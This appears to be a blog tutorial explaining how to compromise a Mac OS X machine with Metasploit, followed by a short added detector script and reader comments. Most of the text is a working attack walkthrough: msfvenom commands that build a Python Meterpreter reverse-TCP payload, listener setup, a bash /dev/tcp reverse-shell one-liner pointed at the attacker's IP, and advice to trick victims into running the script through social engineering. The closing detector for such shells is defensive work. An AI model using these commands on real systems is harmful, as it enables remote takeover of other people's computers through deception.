Wednesday, January 23, 2019

How to hack Mac OSX with Metasploit

When it comes to Metasploit, a lot of people only target Windows machines and avoid Macs because they think it is not possible, but that is not true. Today I am going to show you how to use Metasploit to generate a payload that can be deployed on a Mac OSX machine and instantly connects back to our machine over a reverse_tcp connection.

Since Mac OS ships with Python, we can use that to our advantage: msfvenom (part of Metasploit) can generate a Python script with the reverse_tcp payload embedded inside it.

1. Turn on your Kali and open a terminal.

2. Type in the following command and press Enter:

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.26.130 LPORT=4444 > pyterpreter.py

Now pyterpreter.py should appear in your home folder.

[Screenshot: pyterpreter script location]

3. Open a new terminal and launch Metasploit by typing msfconsole and pressing Enter. We need to set up a listener so that when the script runs on the Mac, it connects straight back to our attack machine.

[Screenshot: msfconsole]

4. In the new terminal, type in use multi/handler and press Enter.

[Screenshot: multi handler]

5. Now we need to set the PAYLOAD, the LHOST (the attacker's IP address) and the LPORT (the port we want to listen on). You can do that by executing the following commands one after the other.

set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.26.130 
set LPORT 4444

[Screenshot: set payload, lhost and lport]

6. To start the handler, enter the command exploit -j -z

The exploit command tells Metasploit to start the handler, which waits for the Mac to connect back. The -j flag tells Metasploit to run it in the context of a job, and -z means not to interact with the session once it becomes active. Running the handler as a job lets it run in the background and gives you control of the process while it runs. Your screen should look similar to the one below.

[Screenshot: exploit]

7. Now send the pyterpreter.py file to the Mac machine and execute it. Since we are testing this, you will have to open a terminal on the Mac and run python pyterpreter.py yourself; in a real scenario you would use some type of social engineering to convince the Mac user to execute the script from a terminal on their Mac.

Once executed, the script should immediately exit and keep running in the background on the Mac. You should now have a new session on your attack machine. Enter the command sessions -i 1 and press Enter. You should now be able to interact with the Mac machine.

To see a list of the available commands, type help and press Enter. This shows you the commands you can execute, or you can simply run the shell command to drop into a shell and take direct control of the Mac.

[Screenshot: help with metasploit commands]

An alternative and quicker way to get Meterpreter running on the Mac machine is to start off with a reverse shell. Just as in the handler set-up shown above, all you have to do is set up a handler in Metasploit, but this time you set the payload to "osx/x64/shell_reverse_tcp" instead. All the other handler settings stay exactly the same, and this way you don't even need to generate a script with msfvenom. Simply run the handler, then run the following command in a terminal on the Mac machine:

bash -i >& /dev/tcp/192.168.26.130/4444 0>&1 2>&1

This command simply means "send an interactive bash session to IP address 192.168.26.130 on TCP port 4444."

Going back to Kali, you should see a new session opened in Metasploit. Don't interact with the session directly, because if you do, it will simply terminate once you are done with it. Instead, upgrade it to a Meterpreter session by running the following command in Metasploit (assuming your new session ID is 1):

sessions -u 1

Now you should have a new Meterpreter session open and you should be able to interact with the Mac.
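For the defensive side of the bash one-liner above, here is a small detector added as an example (not code from the original post): it scans process command lines for a shell whose file descriptors are redirected to a /dev/tcp or /dev/udp pseudo-path and extracts the destination host and port, rating an interactive shell (bash -i) wired to the socket higher than plain /dev/tcp I/O. The telemetry records and their field names (pid, user, cmd) are constructed for this example, not a real macOS log format.

```python
import re
from typing import List, NamedTuple, Optional, Tuple

# Constructed sample of process-creation telemetry (field names are assumptions).
# Record 417 is the reverse shell one-liner from the post; the rest is benign noise
# plus a non-interactive /dev/tcp use to show the severity difference.
SAMPLE_EVENTS = [
    {"pid": 412, "user": "alice", "cmd": "ls -la /Users/alice/Downloads"},
    {"pid": 417, "user": "alice", "cmd": "bash -i >& /dev/tcp/192.168.26.130/4444 0>&1 2>&1"},
    {"pid": 420, "user": "bob", "cmd": "cat /dev/tcp_notes.txt"},
    {"pid": 425, "user": "bob", "cmd": "sh -c 'exec 3<>/dev/tcp/10.0.0.5/80; echo ok >&3'"},
]

# /dev/tcp or /dev/udp pseudo-path with an explicit host and port component.
DEV_TCP = re.compile(r"/dev/(?:tcp|udp)/(?P<host>[^/\s'\"]+)/(?P<port>\d{1,5})\b")
# A shell launched with -i (interactive): "bash -i", "sh -i", "zsh -i", ...
INTERACTIVE_SHELL = re.compile(r"(?:^|[\s;&|])(?:ba|z|k|da)?sh\s+(?:-\S*\s+)*-i\b")
# A file-descriptor redirection aimed at the pseudo-path: >&, &>, <>, 0>, 2>, 3< ...
FD_REDIRECT = re.compile(r"(?:>&|&>|<>|\d*[<>])\s*/dev/(?:tcp|udp)/")

class Hit(NamedTuple):
    pid: int
    user: str
    host: str
    port: int
    severity: str  # "high": interactive shell bound to the socket; "medium": bare /dev/tcp I/O

def classify(cmd: str) -> Optional[Tuple[str, int, str]]:
    """Return (host, port, severity) when cmd talks to /dev/tcp or /dev/udp, else None."""
    m = DEV_TCP.search(cmd)
    if not m:
        return None
    port = int(m.group("port"))
    if not 1 <= port <= 65535:  # not a valid port, so not a real socket pseudo-path
        return None
    redirected = FD_REDIRECT.search(cmd) is not None
    interactive = INTERACTIVE_SHELL.search(cmd) is not None
    severity = "high" if (redirected and interactive) else "medium"
    return m.group("host"), port, severity

def scan(events) -> List[Hit]:
    """Run classify() over every record and collect the hits with their pid and user."""
    hits = []
    for ev in events:
        result = classify(ev["cmd"])
        if result:
            host, port, severity = result
            hits.append(Hit(ev["pid"], ev["user"], host, port, severity))
    return hits

if __name__ == "__main__":
    for h in scan(SAMPLE_EVENTS):
        print(f"[{h.severity}] pid={h.pid} user={h.user} -> {h.host}:{h.port}")
```

The extracted host and port are what you would feed into an egress block or a network search for other hosts that contacted the same listener.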

3 comments:

  1. If I had «[...] to convince the Mac user into executing the script via a terminal on their Mac [...]», I surely have no need to launch Metasploit; I would just connect to the remote daemon with whatever tool I choose. This article is a fake.

    Replies
    1. Yeah, but the goal of this is to show that it can be done with Metasploit if the user chooses to use Metasploit as a hacking tool. I am sure there are other ways to hack a Mac.

  2. This article is fake. I would «convince the Mac user into executing [...]» whatever tool I want! No need to use Metasploit.
